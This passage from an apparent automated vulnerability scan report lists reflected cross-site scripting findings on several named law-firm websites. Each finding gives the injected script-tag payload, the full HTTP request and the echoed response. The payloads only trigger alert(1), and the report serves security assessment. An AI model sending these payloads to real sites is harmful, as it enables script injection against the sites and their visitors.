Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies940d0"><script>alert(1)</script>8c7d3e9285e/software-print">
...[SNIP]...

4.161. http://www.hbsr.com/practices_technologies/software [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/software

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 931a5"><script>alert(1)</script>bea7ff528b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:27:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software931a5"><script>alert(1)</script>bea7ff528b1-print">
...[SNIP]...

4.162. http://www.hbsr.com/practices_technologies/software [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/software

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cf66"><script>alert(1)</script>9fc1b0ef96e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/telecommunications
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.3.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:27:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18763

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/software?6cf66"><script>alert(1)</script>9fc1b0ef96e=1&printable=yes">
...[SNIP]...

4.163. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c3c6"><script>alert(1)</script>c469b26ecf4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies7c3c6"><script>alert(1)</script>c469b26ecf4/telecommunications-print">
...[SNIP]...

4.164. http://www.hbsr.com/practices_technologies/telecommunications [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/telecommunications

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6292"><script>alert(1)</script>f9653883093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8877

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunicationsd6292"><script>alert(1)</script>f9653883093-print">
...[SNIP]...

4.165. http://www.hbsr.com/practices_technologies/telecommunications [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hbsr.com
Path:	/practices_technologies/telecommunications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a22e"><script>alert(1)</script>2ad03aa0f89 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1 HTTP/1.1
Host: www.hbsr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hbsr.com/practices_technologies/index
Cookie: __utma=94973637.168735978.1305202890.1305202890.1305202890.1; __utmb=94973637.2.10.1305202890; __utmc=94973637; __utmz=94973637.1305202890.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Hamilton%20Brook%20Smith%20%26%20Reynolds

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:26:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="http://www.hbsr.com/practices_technologies/telecommunications?4a22e"><script>alert(1)</script>2ad03aa0f89=1&printable=yes">
...[SNIP]...

4.166. http://www.pillsburylaw.com/connect_forgotpassword.cfm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pillsburylaw.com
Path:	/connect_forgotpassword.cfm

4.170. http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb09b"><script>alert(1)</script>c37b8140c4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb09b"><script>alert(1)</script>c37b8140c4a HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:12 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/favicon.icocb09b"><script>alert(1)</script>c37b8140c4a');" title="Email Page">
...[SNIP]...

4.171. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/industries_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e53a"><script>alert(1)</script>4a16753e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:17 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index');" title="Email Page">
...[SNIP]...

4.172. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/industries_technologies/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 863d1"><script>alert(1)</script>8dd4b629ffa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:18 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa');" title="Email Page">
...[SNIP]...

4.173. http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/industries_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9f3"><script>alert(1)</script>13f530a4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:13 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 42976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1');" title="Email Page">
...[SNIP]...

4.174. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a405c"><script>alert(1)</script>04df5b956ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:09 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.175. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36e6"><script>alert(1)</script>50931122149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:10 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149');" title="Email Page">
...[SNIP]...

4.176. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/industries_technologies/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cd6"><script>alert(1)</script>c085222620d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:08 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1');" title="Email Page">
...[SNIP]...

4.177. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac1d"><script>alert(1)</script>e29a99f7d9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:06 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.178. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3041"><script>alert(1)</script>5a79aaed420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:07 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420');" title="Email Page">
...[SNIP]...

4.179. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.wolfgreenfield.com
Path:	/practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fda"><script>alert(1)</script>b70efdb17f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11010

